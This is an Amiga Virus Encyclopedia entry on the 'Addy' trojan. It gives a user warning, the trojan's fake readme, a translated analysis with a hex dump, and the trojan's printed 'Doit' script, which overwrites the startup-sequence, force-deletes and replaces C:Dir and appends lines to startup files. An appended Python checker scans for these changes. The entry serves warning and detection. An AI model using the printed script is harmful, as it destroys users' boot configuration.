------------------------
Amiga Virus Encyclopedia
Addy Trojan
------------------------
Hi all
Do NOT start the 'ADDY0.99.Exe', it will replace your startup-sequence
and shell-startup, and add 656 bytes to your c:Dir command.
It will change your startup-sequence with a new small one:
Prompt "AfraId ?..tHe fReAk wAs hEre 2 dEvEstAte NDOS:>"
Every time you run a shell it will add a line in your user-startup
"Wait 5" and you will see the text above when you are rebooting.
I do not know what it does to your C:Dir command, but if you have
started this program up, then replace the c:Dir command with a new
clean one from your WB disks.
It will work under KS 2.0 and 3.0, have not tested it under KS 1.3 yet.
There is a "Readme" text in the archive, this is what it says:
///////////////////////// Addy Ver. 0.99 \\\\\\\\\\\\\\\\\\\\\\\\
--------------
WHAT THE FUCK IS IT ?
A small BBS Add maker, for you guys to put in your .lha's :)
This Programme is made by me, if you like it, tell me cause i've JUST
started learning how to do make small programmes, if there are any bugs
in it, please let me know, i can be found at the coolest bbs'es in Sw.
(Sorry about the lame doc, but i just cant wait to release my
first programme).
Usage:
If you cant figure this one out, you never will.
Simply double click And follow the instructions. Easy Huh ?
Known Bugs: NONE.. at all.. tested very well.. Wouldent want my first
release to be crap.. would I ?
Written By The Freak !
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\////////////////////////////////
There is a FILE_ID.DIZ too, here is the text:
_________________________
: :
| _____________________ |
| \\\\\\\\\\/////////// |
| \\Addy\ver./0.99/// |
| \\\\\my\FIRST//// |
| \\Release EVER/ |
| \\\\\\/////// |
| ~~~~~~~~~~~ |
| > bY tHe FreAk < |
| SysOp at |
| Money Talks |
| +44 ELITE ONLY |
+_________________________+
------ END -------
The archive is on its way to every well known antivirus programmer
in the world, thanx guys for the great job you are doing.....
Thanx to Morph, for sending me this new 'Thing'.
Antivirus removal: Kickstart 1.2 & 1.3 : VT-Schutz v3.17
Kickstart all others: VirusZ III with Xvs.library installed
Regards
_________ _
Jan Andersen. ____/"""./###/____)\_____________
Virus Help - Team Denmark. /"""/ //_______ /"""/""./"___/_HELP!
/ / //"""/" / // / //____ \_
\ // / ____/ / //""""/X\@!/
\_____/\__/___/ ""\______/_________/
/____/
=============== Documentation from VT by Heiner Schneegold =============
Addy Trojan file
VT only offers delete.
No vectors patched
Not reset-proof
Length packed: 9584 bytes
A script packer is used, which I have rarely come across so far.
Needs Copy, Delete with FORCE (i.e. newer WB) and Wait. Otherwise
the script aborts.
Then carry out a reset.
The file reads:
6d6f7279 0000434f 4e3a302f 302f3634 mory..CON:0/0/64
302f3230 302f5465 73743031 0000646f 0/200/Test01..do
732e6c69 62726172 79007261 6d3a7100 s.library.ram:q.
72616d3a 54656d70 00006364 2072616d ram:Temp..cd ram
3a54656d 700a5255 4e200000 00000000 :Temp.RUN ......
; .....
00000000 00000000 00006364 2072616d ..........cd ram
3a54656d 70200a45 58454355 54452000 :Temp .EXECUTE .
; .....
00000000 00000000 00000000 0a656e64 .............end
636c690a 0a776169 7420330a 656e6463 cli..wait 3.endc
6c690a00 00000000 00000004 446f6974 li..........Doit
Damages:
Writes a new Dir command (the Addy Dir is wrong, see below)
Changes Startup-Sequence, User-Startup and Shell-Startup.
So you should also have backups of these files on disk.
Shell Startup:
Before:
; ......
Alias XCopy "Copy CLONE"
After:
; ......
Alias XCopy "Copy CLONE"
wAiT 5
Echo Wait 5 >> Sys:S/sTarTup-SEQUENCE
Startup-Sequence:
Before:
; cls
; Test line
; Test line
; Test line
After:
Prompt "AfraId ?..tHe fReAk wAs hEre 2 dEvEstAte NDOS:>"
wAiT 5
So the beginning of my startup-sequence was simply deleted !!!!!
User-Startup:
Before:
; ......
; END AsimCDFS
After:
; ......
; END AsimCDFS
wAiT 5
Several files have appeared in RAM:T and RAM:Temp, but they
disappear again with the RESET.
An example: contents of Doit (a script):
Type Ram:temp/Oups > Sys:s/StaRtup-SeqUeNcE
Delete C:Dir Quiet Force
Copy Ram:temp/Dir C:
eCHo wAiT 5 >> SyS:s/sTarTuP-SeQuEnCe
eCHo wAiT 5 >> SyS:s/uSeR-StaRtUp
eChO wAiT 5 >> SyS:S/SheLl-StArtUp
Echo Echo Wait 5 >> Sys:S/Shell-Startup >> Sys:S/sTarTup-sEquEncE
Echo Error # 0025 Program Loop Unexpected
Wait 1
test01
Original text by Heiner Schneegold
Translated from German to English by Google Translate
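
Added example (not part of the original report and not code from VT or VirusZ): a Python check that scans exported text copies of the three startup scripts for the changes listed under "Damages" and compares the size of C:Dir with a clean copy. The function names, the file labels and the sample contents are assumptions made for this illustration.

```python
import re

# Indicators from the write-up above; matching ignores case because the
# trojan writes its commands in mixed case ("wAiT 5").
PROMPT_RE = re.compile(r'^\s*prompt\s+".*the\s+freak\s+was\s+here.*"', re.I)
WAIT_RE = re.compile(r'^\s*(wait)\s+5\s*$', re.I)
ECHO_RE = re.compile(r'^\s*echo\s+.*wait\s+5\s*>>\s*sys:\s*s\s*/', re.I)
DIR_GROWTH = 656  # bytes the report says are added to C:Dir


def scan_script(name, text):
    """Return (file, line number, reason) for every suspicious line."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        wait = WAIT_RE.match(line)
        if PROMPT_RE.match(line):
            hits.append((name, no, "Addy prompt string"))
        elif ECHO_RE.match(line):
            hits.append((name, no, "Echo that appends Wait 5 to a startup file"))
        elif wait:
            word = wait.group(1)
            # A normally cased Wait 5 may be the user's own; flag odd casing only.
            if not (word.islower() or word.isupper() or word.istitle()):
                hits.append((name, no, "mixed-case Wait 5"))
    return hits


def scan_all(files):
    """Scan a mapping of file label -> file text and collect all findings."""
    return [hit for name, text in files.items() for hit in scan_script(name, text)]


def dir_size_suspicious(clean_size, installed_size):
    """True when the installed C:Dir is exactly DIR_GROWTH bytes larger."""
    return installed_size - clean_size == DIR_GROWTH


# Constructed sample contents, modelled on the Before/After listings above.
SAMPLE = {
    "S:Startup-Sequence":
        'Prompt "AfraId ?..tHe fReAk wAs hEre 2 dEvEstAte NDOS:>"\nwAiT 5\n',
    "S:Shell-Startup":
        'Alias XCopy "Copy CLONE"\nwAiT 5\nEcho Wait 5 >> Sys:S/sTarTup-SEQUENCE\n',
    "S:User-Startup": "; END AsimCDFS\nwAiT 5\n",
}

if __name__ == "__main__":
    for hit in scan_all(SAMPLE):
        print("%s line %d: %s" % hit)
```

A hit only shows that a script matches the listings above; restoring the three scripts and C:Dir from backups is still the repair.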